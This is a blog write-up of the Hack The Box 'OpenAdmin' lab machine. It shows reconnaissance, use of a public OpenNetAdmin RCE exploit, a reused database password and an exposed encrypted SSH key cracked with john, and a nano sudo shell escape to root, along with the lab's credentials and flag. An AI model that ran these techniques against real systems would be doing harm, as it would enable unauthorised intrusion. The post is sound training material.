<disclaimer>this is an old post, that was finished some time ago (February 2020), but due to the things (I forgot about retiring the machine) I’m publishing it now</disclaimer>

It’s been a looooong time…

… since I’ve written something here. This place is not dead yet. I had really tight schedule with my security job, school, CTFs and PozSec meetups organization soooo it was really hard to start blogging again. I’m still learning so some topics I want to cover in depth require some time. But here I am with pretty easy challenge from HTB. It is my first HTB writeup and now I cannot wait to publish it! But I have to wait for the embargo to exceed.

card

Recon

First things first. Box is located at 10.10.10.171 address. I’ve added an entry to /etc/hosts to localize it by domain name.

10.10.10.171	oneadmin.htb

Nmap scan didn’t show anything interesting:

sudo nmap -T aggressive -sC -sV  10.10.10.171 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 01:32 CET
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.60 seconds

Recon with -p- options gave nothing new. Standard ssh service and a single http server running on port 80. HTB is not about bruteforcing, so without initial foothold trying to leak users with this enumeration exploit is rather bad idea. Next part of the recon included running gobuster on / directory.

 gobuster dir -u 10.10.10.171 -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml

The tool has found some pages on the host:

artwork
music
sierra

And some forbidden_403_not_so_interesting_stuff (looked like rules to redirect all .htaccess etc.). Recursive search on given domains gave some files, but nothing particulary important.

 gobuster dir -u 10.10.10.171/artwork -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,

 gobuster dir -u 10.10.10.171/msuic -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
 gobuster dir -u 10.10.10.171/sierra -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml

At this point after analysis of the content of hosted files I had really hard time. Nothing to see here, but there must have be something…

In the meantime I’ve tried to enum ssh users using CVE-2018-15473since OpenSSH version 7.6p1 but that was the dead end with false positives only. After changing the method in msf no results were returned. Other tool also has failed.

Stuck

Sometimes during the pentest it is really nice to have a collection of all hyperlinks on the website. Probably there will be something interesting. I’ve written a simple and really fast crawler to achieve that. Here is the most important part of the generated report.

[...]

=== REPORT ===
=== IN WEBSITE LINKS ===
+-----------------------------------------+-----------------------------------------+
| source                                  | target                                  |
+=========================================+=========================================+
| http://10.10.10.171/music/contact.html  | http://10.10.10.171/music/blog.html     |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/playlist.html | http://10.10.10.171/music/blog.html     |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/artist.html   | http://10.10.10.171/music/category.html |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/index.html    | http://10.10.10.171/ona                 | <- this entry
+-----------------------------------------+-----------------------------------------+

[...]

It’s really a pitty that this wasn’t found by some popular wordlists for dirbusting. But well, yeah. Back on track.

Local shell

/ona redirected to OpenNetAdmin 18.1.1. The tool for managing inventory of your network. This version is vulnerable and RCE and the PoC was published. Unfortunately the .sh script hasn’t worked for me. Finally I’ve found the right exploit which gave a really simple shell for www-data user.

> python ona-rce.py exploit http://10.10.10.171/ona
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$

Poking around

Next stage of the enumeration involved looking around to obtain a real shell, probably ssh to the machine. At this time I’ve decided not to create any type of more complicated shell with for example a python tty. Just looked around for available stuff.

sh$ ls -la
total 88
drwxrwxr-x 10 www-data www-data  4096 Feb 20 20:33 .
drwxr-x---  7 www-data www-data  4096 Nov 21 18:23 ..
-rw-rw-r--  1 www-data www-data  1970 Jan  3  2018 .htaccess.example
-rw-r--r--  1 www-data www-data 16384 Feb 20 20:33 .login.php.swp
drwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 config
-rw-rw-r--  1 www-data www-data  1949 Jan  3  2018 config_dnld.php
-rw-rw-r--  1 www-data www-data  4160 Jan  3  2018 dcm.php
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 images
drwxrwxr-x  9 www-data www-data  4096 Jan  3  2018 include
-rw-rw-r--  1 www-data www-data  1999 Jan  3  2018 index.php
drwxrwxr-x  5 www-data www-data  4096 Jan  3  2018 local
-rw-rw-r--  1 www-data www-data  4526 Jan  3  2018 login.php
-rw-rw-r--  1 www-data www-data  1106 Jan  3  2018 logout.php
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 modules
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 plugins
drwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 winc
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 workspace_plugins

Grepping directiories and searching for the password redirected to the local/config directory.

sh$ ls -la local
total 20
drwxrwxr-x  5 www-data www-data 4096 Jan  3  2018 .
drwxrwxr-x 10 www-data www-data 4096 Feb 20 20:33 ..
drwxrwxr-x  2 www-data www-data 4096 Nov 21 16:51 config
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 nmap_scans
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 plugins

With database_settings.inc.php in it.

sh$ ls -la local/config
total 16
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 .
drwxrwxr-x 5 www-data www-data 4096 Jan  3  2018 ..
-rw-r--r-- 1 www-data www-data  426 Nov 21 16:51 database_settings.inc.php
-rw-rw-r-- 1 www-data www-data 1201 Jan  3  2018 motd.txt.example
-rw-r--r-- 1 www-data www-data    0 Nov 21 16:28 run_installer

Further look at that file gave some really interesting results.

sh$ cat local/config/database_settings.inc.php

MySQL creds laying on the ground.

[...]
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,

[...]
))

I’ve tried listing users on the box. I did it simply by checking the home directory on the host.

sh$ ls -la /home
total 16
drwxr-xr-x  4 root   root   4096 Nov 22 18:00 .
drwxr-xr-x 24 root   root   4096 Nov 21 13:41 ..
drwxr-x---  5 jimmy  jimmy  4096 Nov 22 23:15 jimmy
drwxr-x---  6 joanna joanna 4096 Nov 28 09:37 joanna

Attempted to do some kind of password spraying attack. Got three accounts on the host (with root), one password and after one try, I’ve managed to login! Remember users never ever reuse your passwords.

ssh jimmy@10.10.10.171 
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 20 20:53:53 UTC 2020

  System load:  0.24              Processes:             118
  Usage of /:   50.8% of 7.81GB   Users logged in:       0
  Memory usage: 27%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Last login: Thu Jan  2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ ls

Looked like the first shell had been spawned. But no user.txt file was there. Needed to look deeper [meme].

Priviliage escalation

It was time to do some priv esc. Firstly to obtain access to joanna home directory, then root.

Horizontal

In general there are two types of priviliage escalation. Horizontal means trying to get another users that are not power users like root. But they may belong to different groups and have read and write rights to some interesting locations. My obvious choice was to target joanna’s account.

jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root  root  4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy    9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr  4  2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy  807 Apr  4  2018 .profile
jimmy@openadmin:~$ cat .bash_history
jimmy@openadmin:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
jimmy@openadmin:~$ sudo !!
sudo cat /etc/shadow
[sudo] password for jimmy: 
jimmy is not in the sudoers file.  This incident will be reported.
jimmy@openadmin:~$ w
 20:54:54 up  1:59,  1 user,  load average: 0.09, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jimmy    pts/0    10.10.14.7       20:53    0.00s  0.05s  0.00s w

I’ve run LinEnum.sh script but found nothing unusual. My main focus was redirected to /var/www directory. There was an internal directory exposed by Apache server on 52846 port.

jimmy@openadmin:/var$ cat /etc/apache2/sites-enabled/internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

And AssignUserID was set to joanna.
The directory presented three .php files with one that was particulary interesting.

jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php

The main.php source code presented below had shell_exec('cat /home/joanna/.ssh/id_rsa') directive. This should have cat (and then embed) the private RSA key of user joanna on the visited website.

jimmy@openadmin:/var$ cat www/internal/main.php 
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Tried to run main.php on the right port and got pretty meaningful response.

jimmy@openadmin:/var$ curl -ksi 127.0.0.1:52846/main.php
HTTP/1.1 302 Found
Date: Thu, 20 Feb 2020 21:42:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=uk2vqsqf0o2kmdghf9vakc87dj; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /index.php
Content-Length: 1902
Content-Type: text/html; charset=UTF-8
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D


kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----

</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

But as presented above the private key was encrypted. There was a hint to remember about ninja password. I didn’t remember any, so downloaded john toolkit and rockyou.txt dictionary for the beginning.

~/devp/htb/openadmin ❯  ssh2john things.key joanna.hash
~/devp/htb/openadmin ❯ john joanna.hash -wordlist=/home/rav/tools/SecLists/rockyou.txt 
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (joanna_ssh.key)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:03 DONE (2020-02-20 23:59) 0.2570g/s 3686Kp/s 3686Kc/s 3686KC/s *7¡Vamos!
Session completed

Two seconds later john cracked the password: bloodninjas. I’ve used in combination with the key and finally logged as joanna! Got user.txt file. So this part of the challenge was done.

~/devp/htb/openadmin ❯ ssh -i things.key joanna@10.10.10.171
Enter passphrase for key 'things.key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 20 22:04:05 UTC 2020

  System load:  0.0               Processes:             124
  Usage of /:   51.2% of 7.81GB   Users logged in:       1
  Memory usage: 35%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3

joanna@openadmin:~$ ls -la
total 332
drwxr-x--- 6 joanna joanna   4096 Feb 20 22:22 .
drwxr-xr-x 4 root   root     4096 Nov 22 18:00 ..
lrwxrwxrwx 1 joanna joanna      9 Nov 22 18:02 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna    220 Nov 22 18:00 .bash_logout
-rw-r--r-- 1 joanna joanna   3771 Nov 22 18:00 .bashrc
drwx------ 2 joanna joanna   4096 Nov 22 22:42 .cache
drwx------ 3 joanna joanna   4096 Nov 22 22:42 .gnupg
-rwxrwxr-x 1 joanna joanna  46632 Feb 20 22:08 linenum.sh
drwxrwxr-x 3 joanna joanna   4096 Nov 22 18:53 .local
-rwxrwxr-x 1 joanna joanna  34317 Feb 20 22:09 lse.sh
-rw------- 1 joanna joanna      8 Feb 20 22:22 nano.save
-rw-r--r-- 1 joanna joanna    807 Nov 22 18:00 .profile
-rw-rw-r-- 1 joanna joanna 204173 Feb 20 22:17 report.txt-20-02-20
drwx------ 2 joanna joanna   4096 Nov 23 17:31 .ssh
-rw-rw-r-- 1 joanna joanna     33 Nov 28 09:37 user.txt
-rw------- 1 joanna joanna   1689 Feb 20 22:09 .viminfo
joanna@openadmin:~$ wc -c user.txt 
33 user.txt

I’ve uploaded LinEnum.sh and lse.sh scripts for vertical priviliage escalation. Both scripts found that user joanna can run /bin/nano /opt/priv with SUDO and without the password.

Vertical

The GTFOBins (this is particulary for nano but there are other awesome too) are snippets for spawning shell by many binaries available on the GNU/Linux machines. This time one of the methods worked for me and allowed to spawn the root shell.

nano
^R^X
reset; sh 1>&0 2>&0

And here is the dump of commands used as root. Haven’t tried to create more reliable shell since wanted only to gather the output from root.txt file.

Command to execute: reset; sh 1>&0 2>&0# whoami                                                                      
rootet Help                                               ^X Read File
# cat /root.txt                                           M-F New Buffer
cat: /root.txt: No such file or directory
# ls
linenum.sh  lse.sh  nano.save  report.txt-20-02-20  user.txt
# cd ~
# ls
linenum.sh  lse.sh  nano.save  report.txt-20-02-20  user.txt
# ls /
bin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  swap.img  tmp  var      vmlinuz.old
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   sys       usr  vmlinuz
# ls /root
root.txt
# cat /root/tx
cat: /root/tx: No such file or directory
# cat /root/root.txt
2f907ed450b361b2c2bf4e8795d5b561
# wc -l /root/root.txt
1 /root/root.txt
# wc -c /root/root.txt
33 /root/root.txt

Which was successfull.

Bottom line

I’ve really enjoyed this box. OpenAdmin Challenge was a little bit tricky and all about the enumeration. Nothing fancy and no binary exploitation here. But I’ve learned one more time that sometimes provided tools are not reliable.

Thank you for reading and see ya next time!

foxtrot_charlie over and out!